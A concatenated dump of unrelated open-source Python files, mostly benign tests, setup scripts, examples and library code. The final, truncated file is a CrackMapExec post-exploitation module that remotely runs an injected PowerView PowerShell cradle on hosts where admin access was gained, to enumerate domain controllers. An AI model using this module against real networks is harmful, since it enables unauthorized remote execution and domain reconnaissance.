"1990'da",
"ise",
"bir",
"yangın",
",",
"daha",
"sonraları",
"ahırlarla",
"birlikte",
"yıkılacak",
"olan",
"tahta",
"tribünlerden",
"geri",
"kalanları",
"da",
"yok",
"etmişti",
".",
],
),
(
"Dahiyane bir ameliyat ve zorlu bir rehabilitasyon sürecinden sonra, tamamen iyileştim.",
[
"Dahiyane",
"bir",
"ameliyat",
"ve",
"zorlu",
"bir",
"rehabilitasyon",
"sürecinden",
"sonra",
",",
"tamamen",
"iyileştim",
".",
],
),
(
"Yaklaşık iki hafta süren bireysel erken oy kullanma döneminin ardından 5,7 milyondan fazla Floridalı sandık başına gitti.",
[
"Yaklaşık",
"iki",
"hafta",
"süren",
"bireysel",
"erken",
"oy",
"kullanma",
"döneminin",
"ardından",
"5,7",
"milyondan",
"fazla",
"Floridalı",
"sandık",
"başına",
"gitti",
".",
],
),
(
"Ancak, bu ABD <NAME>ı'nın dünyayı bu konularda uyarmasının ardından ortaya çıktı.",
[
"Ancak",
",",
"bu",
"ABD",
"Çevre",
"Koruma",
"Ajansı'nın",
"dünyayı",
"bu",
"konularda",
"uyarmasının",
"ardından",
"ortaya",
"çıktı",
".",
],
),
(
"Ortalama şansa ve 10.000 Sterlin değerinde tahvillere sahip bir yatırımcı yılda 125 Sterlin ikramiye kazanabilir.",
[
"Ortalama",
"şansa",
"ve",
"10.000",
"Sterlin",
"değerinde",
"tahvillere",
"sahip",
"bir",
"yatırımcı",
"yılda",
"125",
"Sterlin",
"ikramiye",
"kazanabilir",
".",
],
),
(
"Granit adaları; Seyşeller ve Tioman ile Saint Helena gibi volkanik adaları kapsar.",
[
"Granit",
"adaları",
";",
"Seyşeller",
"ve",
"Tioman",
"ile",
"Saint",
"Helena",
"gibi",
"volkanik",
"adaları",
"kapsar",
".",
],
),
(
"Barış antlaşmasıyla İspanya, Amerika'ya Porto Riko, Guam ve Filipinler kolonilerini devretti.",
[
"Barış",
"antlaşmasıyla",
"İspanya",
",",
"Amerika'ya",
"Porto",
"Riko",
",",
"Guam",
"ve",
"Filipinler",
"kolonilerini",
"devretti",
".",
],
),
(
"Makedonya'nın sınır bölgelerini güvence altına alan Philip, büyük bir Makedon ordusu kurdu ve uzun bir fetih seferi için Trakya'ya doğru yürüdü.",
[
"Makedonya'nın",
"sınır",
"bölgelerini",
"güvence",
"altına",
"alan",
"Philip",
",",
"büyük",
"bir",
"Makedon",
"ordusu",
"kurdu",
"ve",
"uzun",
"bir",
"fetih",
"seferi",
"için",
"Trakya'ya",
"doğru",
"yürüdü",
".",
],
),
(
"Fransız gazetesi Le Figaro'ya göre bu hükumet planı sayesinde 42 milyon Euro kazanç sağlanabilir ve elde edilen paranın 15.5 milyonu ulusal güvenlik için kullanılabilir.",
[
"Fransız",
"gazetesi",
"Le",
"Figaro'ya",
"göre",
"bu",
"hükumet",
"planı",
"sayesinde",
"42",
"milyon",
"Euro",
"kazanç",
"sağlanabilir",
"ve",
"elde",
"edilen",
"paranın",
"15.5",
"milyonu",
"ulusal",
"güvenlik",
"için",
"kullanılabilir",
".",
],
),
(
"Ortalama şansa ve 10.000 Sterlin değerinde tahvillere sahip bir yatırımcı yılda 125 Sterlin ikramiye kazanabilir.",
[
"Ortalama",
"şansa",
"ve",
"10.000",
"Sterlin",
"değerinde",
"tahvillere",
"sahip",
"bir",
"yatırımcı",
"yılda",
"125",
"Sterlin",
"ikramiye",
"kazanabilir",
".",
],
),
(
"3 K<NAME> günü, <NAME> Başkanı 2014'te hükümetle birlikte oluşturulan kentsel gelişim anlaşmasını askıya alma kararı verdi.",
[
"3",
"Kasım",
"Salı",
"günü",
",",
"Ankara",
"Belediye",
"Başkanı",
"2014'te",
"hükümetle",
"birlikte",
"oluşturulan",
"kentsel",
"gelişim",
"anlaşmasını",
"askıya",
"alma",
"kararı",
"verdi",
".",
],
),
(
"Stalin, Abakumov'u Beria'nın enerji bakanlıkları üzerindeki baskınlığına karşı MGB içinde kendi ağını kurmaya teşvik etmeye başlamıştı.",
[
"Stalin",
",",
"Abakumov'u",
"Beria'nın",
"enerji",
"bakanlıkları",
"üzerindeki",
"baskınlığına",
"karşı",
"MGB",
"içinde",
"kendi",
"ağını",
"kurmaya",
"teşvik",
"etmeye",
"başlamıştı",
".",
],
),
(
"<NAME>'daki kazı alanlarının çoğunluğu gibi, bu bulgu M.Ö. 5. yüzyılın başlar",
[
"Güney",
"Avrupa'daki",
"kazı",
"alanlarının",
"çoğunluğu",
"gibi",
",",
"bu",
"bulgu",
"M.Ö.",
"5.",
"yüzyılın",
"başlar",
],
),
(
"Sağlığın bozulması Hitchcock hayatının son yirmi yılında üretimini azalttı.",
[
"Sağlığın",
"bozulması",
"Hitchcock",
"hayatının",
"son",
"yirmi",
"yılında",
"üretimini",
"azalttı",
".",
],
),
]
TESTS = ABBREV_TESTS + URL_TESTS + NUMBER_TESTS + PUNCT_TESTS + GENERAL_TESTS
@pytest.mark.parametrize("text,expected_tokens", TESTS)
def test_tr_tokenizer_handles_allcases(tr_tokenizer, text, expected_tokens):
tokens = tr_tokenizer(text)
token_list = [token.text for token in tokens if not token.is_space]
print(token_list)
assert expected_tokens == token_list
|
fusepy/setup.py | ffroehling/fuse_module_driver_framework | 229 | 11156452 | #!/usr/bin/env python
from __future__ import with_statement
from setuptools import setup
with open('README') as readme:
documentation = readme.read()
setup(
name = 'fusepy',
version = '3.0.1',
description = 'Simple ctypes bindings for FUSE',
long_description = documentation,
author = '<NAME>',
author_email = '<EMAIL>',
maintainer = '<NAME>',
maintainer_email = '<EMAIL>',
license = 'ISC',
py_modules=['fuse'],
url = 'http://github.com/fusepy/fusepy',
classifiers = [
'Intended Audience :: Developers',
'License :: OSI Approved :: ISC License (ISCL)',
'Operating System :: MacOS',
'Operating System :: POSIX',
'Operating System :: Unix',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 3',
'Topic :: System :: Filesystems',
]
)
|
py_entitymatching/explorer/pandastable/pandastable_wrapper.py | kvpradap/py_entitymatching | 165 | 11156473 | <filename>py_entitymatching/explorer/pandastable/pandastable_wrapper.py
try:
from tkinter import *
except ImportError as e:
from Tkinter import *
from py_entitymatching.utils.validation_helper import validate_object_type
import pandas as pd
def data_explore_pandastable(df):
"""
Wrapper function for pandastable. Gives user a GUI to examine and edit
the dataframe passed in using pandastable.
Args:
df (Dataframe): The pandas dataframe to be explored with pandastable.
Raises:
AssertionError: If `df` is not of type pandas DataFrame.
Examples:
>>> import py_entitymatching as em
>>> A = em.read_csv_metadata('path_to_csv_dir/table.csv', key='ID')
>>> em.data_explore_pandastable(A)
"""
# Validate input parameters
# # We expect the df to be of type pandas DataFrame
validate_object_type(df, pd.DataFrame, 'Input df')
DataExplorePandastable(df)
class DataExplorePandastable(Frame):
"""
A wrapper for pandastable.
"""
def __init__(self, df):
# Import
try:
from pandastable import Table, TableModel
except ImportError:
raise ImportError('Pandastable is not installed. Please install pandastable to use '
'pandastable data exploration functions.')
self.parent = None
Frame.__init__(self)
self.main = self.master
self.main.geometry('600x400+200+100')
self.main.title('Explore Data')
f = Frame(self.main)
f.pack(fill=BOTH, expand=1)
# set the table in the GUI
self.table = pt = Table(f, dataframe=df,
showtoolbar=True, showstatusbar=True)
pt.show()
self.mainloop()
|
rotkehlchen/tests/fixtures/greenlets.py | coblee/rotki | 137 | 11156476 | import pytest
from rotkehlchen.greenlets import GreenletManager
@pytest.fixture(scope='session')
def greenlet_manager(messages_aggregator):
return GreenletManager(msg_aggregator=messages_aggregator)
@pytest.fixture
def function_greenlet_manager(function_scope_messages_aggregator):
return GreenletManager(msg_aggregator=function_scope_messages_aggregator)
|
test/apps/_graphql/_fastapi/__init__.py | stannum-l/schemathesis | 563 | 11156491 | from fastapi import FastAPI
from strawberry.fastapi import GraphQLRouter
from ..schema import schema
def create_app(path="/graphql"):
app = FastAPI()
graphql_app = GraphQLRouter(schema)
app.include_router(graphql_app, prefix=path)
return app
|
accountauth/models.py | FuentesFelipe/asvs | 128 | 11156500 | <gh_stars>100-1000
from django.db import models
# Create your models here.
from django.contrib.auth.models import AbstractUser
class CustomUser(AbstractUser):
is_superuser = models.BooleanField()
is_two_factor_enabled = models.BooleanField()
secret= models.CharField(max_length=400)
|
import.py | ChienNguyenVP/kma_ctf | 501 | 11156520 | """
python import.py export.zip
"""
from CTFd import create_app
from CTFd.utils.exports import import_ctf
import sys
app = create_app()
with app.app_context():
import_ctf(sys.argv[1])
|
inter/LiftTicketInit.py | middleprince/12306 | 33,601 | 11156535 | <gh_stars>1000+
# coding=utf-8
import re
class liftTicketInit:
def __init__(self, session):
self.session = session
def reqLiftTicketInit(self):
"""
请求抢票页面
:return:
"""
urls = self.session.urls["left_ticket_init"]
# 获取初始化的结果
result = self.session.httpClint.send(urls)
# 用正则表达式查出CLeftTicketUrl的值
matchObj = re.search('var CLeftTicketUrl = \'(.*)\'', result, re.M|re.I);
if matchObj:
# 如果有值,替换queryUrl
self.session.queryUrl = matchObj.group(1)
return {
"status": True
}
|
src/misc/listening_test.py | entn-at/blow | 147 | 11156549 | <reponame>entn-at/blow
import sys,argparse,os,subprocess
import numpy as np
# Arguments
parser=argparse.ArgumentParser(description='Audio listening script')
parser.add_argument('--path_refs_train',default='',type=str,required=True,help='(default=%(default)s)')
parser.add_argument('--path_refs_test',default='',type=str,required=True,help='(default=%(default)s)')
parser.add_argument('--paths_convs',default='',type=str,required=True,help='(default=%(default)s)')
parser.add_argument('--player',default='',type=str,required=True,help='(default=%(default)s)')
parser.add_argument('--extension',default='.wav',type=str,required=False,help='(default=%(default)s)')
parser.add_argument('--delimiters',default='_to_,-vcto-',type=str,required=False,help='(default=%(default)s)')
parser.add_argument('--force_file',default='',type=str,required=False,help='(default=%(default)s)')
args=parser.parse_args()
args.paths_convs=args.paths_convs.split(',')
args.delimiters=args.delimiters.split(',')
if args.force_file=='':
args.force_file=None
########################################################################################################################
print('='*100)
print('Load references...')
# Load train refs
fn_refs_train=[]
for dirpath,dirnames,filenames in os.walk(args.path_refs_train):
for fn in filenames:
if fn.endswith(args.extension):
fn_refs_train.append(os.path.join(dirpath,fn))
print(args.path_refs_train,':',len(fn_refs_train),'references (train)')
# Load test refs
fn_refs_test=[]
for dirpath,dirnames,filenames in os.walk(args.path_refs_test):
for fn in filenames:
if fn.endswith(args.extension):
fn_refs_test.append(os.path.join(dirpath,fn))
print(args.path_refs_test,':',len(fn_refs_test),'references (test)')
# Load conversions
print('Load conversions...')
fn_conv={}
convmin=np.inf
pathmin=None
for path in args.paths_convs:
fn_conv[path]=[]
for dirpath,dirnames,filenames in os.walk(path):
for fn in filenames:
if fn.endswith(args.extension):
if args.force_file is None or args.force_file in fn:
fn_out=os.path.join(dirpath,fn)
spk=None
for sep in args.delimiters:
if sep in fn:
fn,spk=fn.split(sep)
break
if spk is None:
continue
spk_ref=spk[:-len(args.extension)]
fn_in=os.path.join(args.path_refs_test,fn+args.extension)
fn_conv[path].append([fn_in,spk_ref,fn_out])
print(path,':',len(fn_conv[path]),'conversions')
if len(fn_conv[path])<convmin:
convmin=len(fn_conv[path])
pathmin=path
print('='*100)
########################################################################################################################
# Play
print('Running test...')
answers=[]
exit=False
np.random.shuffle(fn_conv[pathmin])
n=0
for fn_in,spk_ref,fn_out in fn_conv[pathmin]:
print('-'*100)
np.random.shuffle(fn_refs_train)
for fn in fn_refs_train:
if spk_ref+'_' in fn:
fn_ref=fn
break
print('R:',fn_ref,'-->',fn_in)
tests={}
for path in fn_conv.keys():
for new_fn_in,new_spk_ref,new_fn_out in fn_conv[path]:
if new_fn_in==fn_in and new_spk_ref==spk_ref:
tests[path]=new_fn_out
break
order=list(tests.keys())
np.random.shuffle(order)
nvotes=0
while True:
key=input('Q{:d}: [s/t/1-{:d}/v1-v{:d}/q/n] '.format(n+1,len(tests),len(tests))).lower()
if key=='q':
exit=True
break
elif key=='n':
break
elif key=='s':
subprocess.call([args.player,fn_in],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL)
elif key=='t':
subprocess.call([args.player,fn_ref],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL)
elif key.isdigit():
num=int(key)-1
subprocess.call([args.player,tests[order[num]]],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL)
elif key[0]=='v':
nvotes+=1
print('Voted for system '+key[1]+'! ({:d} votes)'.format(nvotes))
num=int(key[1])-1
answers.append(order[num])
else:
continue
n+=1
if exit:
break
########################################################################################################################
print('='*100)
print('Vote count:')
count={}
for path in fn_conv.keys():
count[path]=0
for ans in answers:
count[ans]+=1
for path in count.keys():
print(path,'\t',count[path])
print('='*100)
|
kubeshell/completer.py | manusajith/kube-shell | 2,143 | 11156582 | <filename>kubeshell/completer.py<gh_stars>1000+
from __future__ import absolute_import, unicode_literals, print_function
from subprocess import check_output
from prompt_toolkit.completion import Completer, Completion
from fuzzyfinder import fuzzyfinder
import logging
import shlex
import json
import os
import os.path
from kubeshell.parser import Parser
from kubeshell.client import KubernetesClient
logger = logging.getLogger(__name__)
class KubectlCompleter(Completer):
def __init__(self):
self.inline_help = True
self.namespace = ""
self.kube_client = KubernetesClient()
try:
DATA_DIR = os.path.dirname(os.path.realpath(__file__))
DATA_PATH = os.path.join(DATA_DIR, 'data/cli.json')
with open(DATA_PATH) as json_file:
self.kubectl_dict = json.load(json_file)
self.parser = Parser(DATA_PATH)
except Exception as ex:
logger.error("got an exception" + ex.message)
def set_inline_help(self, val):
self.inline_help = val
def set_namespace(self, namespace):
self.namespace = namespace
def get_completions(self, document, complete_event, smart_completion=None):
word_before_cursor = document.get_word_before_cursor(WORD=True)
cmdline = document.text_before_cursor.strip()
try:
tokens = shlex.split(cmdline)
_, _, suggestions = self.parser.parse_tokens(tokens)
valid_keys = fuzzyfinder(word_before_cursor, suggestions.keys())
for key in valid_keys:
yield Completion(key, -len(word_before_cursor), display=key, display_meta=suggestions[key])
except ValueError:
pass
|
homeassistant/components/tailscale/coordinator.py | MrDelik/core | 30,023 | 11156583 | """DataUpdateCoordinator for the Tailscale integration."""
from __future__ import annotations
from tailscale import Device, Tailscale, TailscaleAuthenticationError
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from .const import CONF_TAILNET, DOMAIN, LOGGER, SCAN_INTERVAL
class TailscaleDataUpdateCoordinator(DataUpdateCoordinator[dict[str, Device]]):
"""The Tailscale Data Update Coordinator."""
config_entry: ConfigEntry
def __init__(self, hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Initialize the Tailscale coordinator."""
self.config_entry = entry
session = async_get_clientsession(hass)
self.tailscale = Tailscale(
session=session,
api_key=entry.data[CONF_API_KEY],
tailnet=entry.data[CONF_TAILNET],
)
super().__init__(hass, LOGGER, name=DOMAIN, update_interval=SCAN_INTERVAL)
async def _async_update_data(self) -> dict[str, Device]:
"""Fetch devices from Tailscale."""
try:
return await self.tailscale.devices()
except TailscaleAuthenticationError as err:
raise ConfigEntryAuthFailed from err
|
tests/test_reader.py | Vimos/img2dataset | 482 | 11156603 | <reponame>Vimos/img2dataset<filename>tests/test_reader.py
from img2dataset.reader import Reader
import os
from fixtures import generate_input_file, setup_fixtures
import pytest
import math
import time
import gc
import psutil
import shutil
import pandas as pd
def current_memory_usage():
return psutil.Process().memory_info().rss / 1024 / 1024
@pytest.mark.parametrize(
"input_format", ["txt", "csv", "tsv", "tsv.gz", "json", "parquet",],
)
def test_reader(input_format, tmp_path):
"""Tests whether Reader class works as expected."""
expected_count = 10 ** 5 + 5312
test_folder = str(tmp_path)
test_list = setup_fixtures(count=expected_count)
prefix = input_format + "_"
url_list_name = os.path.join(test_folder, prefix + "url_list")
url_list_name = generate_input_file(input_format, url_list_name, test_list)
tmp_path = os.path.join(test_folder, prefix + "tmp")
os.mkdir(tmp_path)
start_shard_id = 37
batch_size = 10000
reader = Reader(
url_list=url_list_name,
input_format=input_format,
url_col="url",
caption_col=None if input_format == "txt" else "caption",
save_additional_columns=None,
number_sample_per_shard=batch_size,
start_shard_id=start_shard_id,
tmp_path=test_folder,
)
if input_format == "txt":
assert reader.column_list == ["url"]
else:
assert reader.column_list == ["caption", "url"]
last_shard_num = math.ceil(expected_count / batch_size) - 1
total_sample_count = 0
start_time = time.time()
initial_memory_usage = current_memory_usage()
for incremental_shard_id, (shard_id, shard_path) in enumerate(reader):
assert incremental_shard_id + start_shard_id == shard_id
shard_df = pd.read_feather(shard_path)
shard = list(enumerate(shard_df[reader.column_list].to_records(index=False).tolist()))
total_sample_count += len(shard)
if last_shard_num == incremental_shard_id:
assert len(shard) <= batch_size
else:
assert len(shard) == batch_size
begin_expected = incremental_shard_id * batch_size
end_expected = (incremental_shard_id + 1) * batch_size
expected_shard = list(enumerate(test_list[begin_expected:end_expected]))
if input_format == "txt":
expected_shard = [(i, (url,)) for i, (_, url) in expected_shard]
assert shard == expected_shard
current_usage = current_memory_usage()
assert current_usage - initial_memory_usage < 100
del expected_shard
del shard
del reader
assert total_sample_count == expected_count
total_time = time.time() - start_time
print("Total time:", total_time)
assert total_time <= 1.0
gc.collect()
final_memory_usage = current_memory_usage()
assert final_memory_usage - initial_memory_usage < 100
|
examples/analog_in.py | Jcc99/Adafruit_Blinka | 294 | 11156615 | """Analog in demo"""
import time
import board
from analogio import AnalogIn
analog_in = AnalogIn(board.A1)
def get_voltage(pin):
return (pin.value * 3.3) / 4096
while True:
print((get_voltage(analog_in),))
time.sleep(0.1)
|
corehq/apps/smsbillables/management/commands/bootstrap_yo_gateway.py | dimagilg/commcare-hq | 471 | 11156646 | <reponame>dimagilg/commcare-hq<gh_stars>100-1000
from decimal import Decimal
from django.core.management.base import BaseCommand
from corehq.apps.accounting.models import Currency
from corehq.apps.sms.models import INCOMING, OUTGOING
from corehq.apps.smsbillables.models import (
SmsGatewayFee,
SmsGatewayFeeCriteria,
)
from corehq.apps.smsbillables.utils import log_smsbillables_info
from corehq.messaging.smsbackends.yo.models import SQLYoBackend
def bootstrap_yo_gateway(apps):
ugx, _ = (apps.get_model('accounting', 'Currency') if apps else Currency).objects.get_or_create(code='UGX')
sms_gateway_fee_class = apps.get_model('smsbillables', 'SmsGatewayFee') if apps else SmsGatewayFee
sms_gateway_fee_criteria_class = apps.get_model('smsbillables', 'SmsGatewayFeeCriteria') if apps else SmsGatewayFeeCriteria
SmsGatewayFee.create_new(
SQLYoBackend.get_api_id(),
INCOMING,
Decimal('110.0'),
currency=ugx,
fee_class=sms_gateway_fee_class,
criteria_class=sms_gateway_fee_criteria_class,
)
SmsGatewayFee.create_new(
SQLYoBackend.get_api_id(),
OUTGOING,
Decimal('55.0'),
currency=ugx,
fee_class=sms_gateway_fee_class,
criteria_class=sms_gateway_fee_criteria_class,
)
log_smsbillables_info("Updated Yo gateway fees.")
class Command(BaseCommand):
help = "bootstrap Yo global SMS backend gateway fees"
def handle(self, **options):
bootstrap_yo_gateway(None)
|
examples/twitter_inlet.py | Voyz/databay | 175 | 11156647 | import os
import tweepy
from databay import Inlet, Link
from databay.outlets import PrintOutlet
from databay.planners import SchedulePlanner
class TwitterInlet(Inlet):
"""
An implementation of an `Inlet` that uses the Tweepy (https://www.tweepy.org/)
Twitter client to pull tweets from either a specific users' timeline or the
home timeline belonging to an authenticated `tweepy.API` instance.
"""
def __init__(self, api: tweepy.API, user: str = None, most_recent_id=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.api = api
self.user = user
# this will ensure we only every pull tweets that haven't been handled
self.most_recent_id = most_recent_id
# sets flag indicating whether we are pulling from as single user
# or from the home timeline.
if self.user is None:
self.is_user_timeline = False
else:
self.is_user_timeline = True
def pull(self, update):
if self.is_user_timeline:
if self.most_recent_id is not None:
public_tweets = self.api.user_timeline(
self.user, since_id=self.most_recent_id)
else:
public_tweets = self.api.user_timeline(
self.user)
else:
if self.most_recent_id is not None:
public_tweets = self.api.home_timeline(
since_id=self.most_recent_id)
else:
public_tweets = self.api.home_timeline()
if len(public_tweets) > 0:
# 0th tweet is most recent
self.most_recent_id = public_tweets[0].id
tweets = []
for tweet in public_tweets:
tweets.append({"user": tweet.user.screen_name, "text": tweet.text})
return tweets
# gets twitter api secrets and keys from environment vars
consumer_key = os.getenv("twitter_key")
consumer_secret = os.getenv("twitter_secret")
access_token = os.getenv("twitter_access_token")
access_token_secret = os.getenv("twitter_access_token_secret")
auth = tweepy.OAuthHandler(
consumer_key, consumer_secret) # user defined values
auth.set_access_token(access_token, access_token_secret) # user defined values
# extra params here protect against twitter rate limiting
# set link intervals with this in mind
# for more on twitter rate limiting see https://developer.twitter.com/en/docs/rate-limits
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
# create TwitterUserInlet() pointed at a specific account name
twitter_user_inlet = TwitterInlet(api, "@BarackObama")
link = Link(twitter_user_inlet, PrintOutlet(only_payload=True),
interval=30, tags='twitter_timeline')
planner = SchedulePlanner(link)
planner.start()
|
examples/python/shakespeare.py | thekuwayama/spark-bigquery-connector | 135 | 11156659 | #!/usr/bin/env python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import tempfile
from pyspark.sql import SparkSession
spark = SparkSession.builder.appName('Shakespeare WordCount').getOrCreate()
table = 'bigquery-public-data.samples.shakespeare'
df = spark.read.format('bigquery').load(table)
# Only these columns will be read
df = df.select('word', 'word_count')
# The filters that are allowed will be automatically pushed down.
# Those that are not will be computed client side
df = df.where("word_count > 0 AND word NOT LIKE '%\\'%'")
# Further processing is done inside Spark
df = df.groupBy('word').sum('word_count')
df = df.orderBy(df['sum(word_count)'].desc()).cache()
print('The resulting schema is')
df.printSchema()
print('The top words in shakespeare are')
df.show()
# Use tempfile just to get random directory name. Spark will create the
# directory in the default file system anyways.
path = tempfile.mkdtemp(prefix='spark-bigquery')
print('Writing table out to {}'.format(path))
df.write.csv(path)
|
stonesoup/movable/tests/test_movable.py | Red-Portal/Stone-Soup-1 | 157 | 11156663 | from datetime import datetime, timedelta
import pytest
import numpy as np
from stonesoup.models.transition.linear import ConstantVelocity, ConstantTurn, \
CombinedLinearGaussianTransitionModel
from stonesoup.movable import MovingMovable, FixedMovable, MultiTransitionMovable
from stonesoup.types.array import StateVector
from stonesoup.types.state import State
def test_fixed_movable_velocity_mapping_error():
# test no error for MovingMovable
_ = MovingMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_model=None,
)
with pytest.raises(ValueError, match='Velocity mapping should not be set for a FixedMovable'):
_ = FixedMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
)
def test_empty_state_error():
# first, check no error
_ = MovingMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_model=None,
)
with pytest.raises(ValueError, match='States must not be empty'):
_ = MovingMovable(position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_model=None,
)
with pytest.raises(ValueError, match='States must not be empty'):
_ = MovingMovable(states=[],
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_model=None,
)
def test_multi_transition_movable_errors():
# First check no error
models = [ConstantVelocity(0), ConstantTurn(0, np.pi/2)]
now = datetime.now()
times = [timedelta(seconds=10), timedelta(seconds=10)]
_ = MultiTransitionMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_models=models,
transition_times=times,
)
with pytest.raises(AttributeError,
match='transition_models and transition_times must be same length'):
_ = MultiTransitionMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_models=[models[0]],
transition_times=times,
)
with pytest.raises(AttributeError,
match='transition_models and transition_times must be same length'):
_ = MultiTransitionMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_models=models,
transition_times=[now],
)
def test_multi_transition_movable_move():
input_state_vector = StateVector([0, 1, 2.2, 78.6])
pre_state = State(input_state_vector, timestamp=None)
models = [CombinedLinearGaussianTransitionModel((ConstantVelocity(0), ConstantVelocity(0))),
ConstantTurn([0, 0], turn_rate=np.pi / 2)]
times = [timedelta(seconds=10), timedelta(seconds=10)]
movable = MultiTransitionMovable(states=pre_state,
position_mapping=[0, 2],
velocity_mapping=[1, 3],
transition_models=models,
transition_times=times,
)
assert movable.state.state_vector is input_state_vector
assert movable.state.timestamp is None
now = datetime.now()
movable.move(now)
assert movable.state.state_vector is input_state_vector
assert movable.state.timestamp is now
movable.move(None)
assert movable.state.state_vector is input_state_vector
assert movable.state.timestamp is now
movable.move(now + timedelta(seconds=10))
assert movable.state.state_vector is not input_state_vector
assert movable.state.timestamp is not now
|
rally/plugins/task/exporters/json_exporter.py | lolwww/rally | 263 | 11156747 | <filename>rally/plugins/task/exporters/json_exporter.py<gh_stars>100-1000
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import datetime as dt
import json
from rally.common import version as rally_version
from rally.task import exporter
TIMEFORMAT = "%Y-%m-%dT%H:%M:%S"
@exporter.configure("json")
class JSONExporter(exporter.TaskExporter):
"""Generates task report in JSON format."""
# Revisions:
# 1.0 - the json report v1
# 1.1 - add `contexts_results` key with contexts execution results of
# workloads.
# 1.2 - add `env_uuid` and `env_uuid` which represent environment name
# and UUID where task was executed
REVISION = "1.2"
def _generate_tasks(self):
tasks = []
for task in self.tasks_results:
subtasks = []
for subtask in task["subtasks"]:
workloads = []
for workload in subtask["workloads"]:
hooks = [{
"config": {"action": dict([h["config"]["action"]]),
"trigger": dict([h["config"]["trigger"]]),
"description": h["config"]["description"]},
"results": h["results"],
"summary": h["summary"], } for h in workload["hooks"]]
workloads.append(
collections.OrderedDict(
[("uuid", workload["uuid"]),
("description", workload["description"]),
("runner", {
workload["runner_type"]: workload["runner"]}),
("hooks", hooks),
("scenario", {
workload["name"]: workload["args"]}),
("min_duration", workload["min_duration"]),
("max_duration", workload["max_duration"]),
("start_time", workload["start_time"]),
("load_duration", workload["load_duration"]),
("full_duration", workload["full_duration"]),
("statistics", workload["statistics"]),
("data", workload["data"]),
("failed_iteration_count",
workload["failed_iteration_count"]),
("total_iteration_count",
workload["total_iteration_count"]),
("created_at", workload["created_at"]),
("updated_at", workload["updated_at"]),
("contexts", workload["contexts"]),
("contexts_results",
workload["contexts_results"]),
("position", workload["position"]),
("pass_sla", workload["pass_sla"]),
("sla_results", workload["sla_results"]),
("sla", workload["sla"])]
)
)
subtasks.append(
collections.OrderedDict(
[("uuid", subtask["uuid"]),
("title", subtask["title"]),
("description", subtask["description"]),
("status", subtask["status"]),
("created_at", subtask["created_at"]),
("updated_at", subtask["updated_at"]),
("sla", subtask["sla"]),
("workloads", workloads)]
)
)
tasks.append(
collections.OrderedDict(
[("uuid", task["uuid"]),
("title", task["title"]),
("description", task["description"]),
("status", task["status"]),
("tags", task["tags"]),
("env_uuid", task.get("env_uuid", "n\a")),
("env_name", task.get("env_name", "n\a")),
("created_at", task["created_at"]),
("updated_at", task["updated_at"]),
("pass_sla", task["pass_sla"]),
("subtasks", subtasks)]
)
)
return tasks
def generate(self):
results = {"info": {"rally_version": rally_version.version_string(),
"generated_at": dt.datetime.strftime(
dt.datetime.utcnow(), TIMEFORMAT),
"format_version": self.REVISION},
"tasks": self._generate_tasks()}
results = json.dumps(results, sort_keys=False, indent=4)
if self.output_destination:
return {"files": {self.output_destination: results},
"open": "file://" + self.output_destination}
else:
return {"print": results}
|
cme/modules/get_netdomaincontroller.py | retr0-13/CrackMapExec | 6,044 | 11156749 | <filename>cme/modules/get_netdomaincontroller.py
from cme.helpers.powershell import *
from cme.helpers.logger import write_log, highlight
from datetime import datetime
from io import StringIO
class CMEModule:
name = 'get_netdomaincontroller'
description = "Enumerates all domain controllers"
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = False
def options(self, context, module_options):
'''
INJECT If set to true, this allows PowerView to work over 'stealthier' execution methods which have non-interactive contexts (e.g. WMI) (default: True)
'''
self.exec_methods = ['smbexec', 'atexec']
self.inject = True
if 'INJECT' in module_options:
self.inject = bool(module_options['INJECT'])
if self.inject: self.exec_methods = None
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
self.ps_script2 = obfs_ps_script('powersploit/Recon/PowerView.ps1')
def on_admin_login(self, context, connection):
command = 'Get-NetDomainController | select Name,Domain,IPAddress | Out-String'
launcher = gen_ps_iex_cradle(context, 'PowerView.ps1', command)
if self.inject:
launcher = gen_ps_inject(launcher, context, inject_once=True)
connection.ps_execute(launcher, methods=self.exec_methods)
context.log.success('Executed launcher')
def on_request(self, context, request):
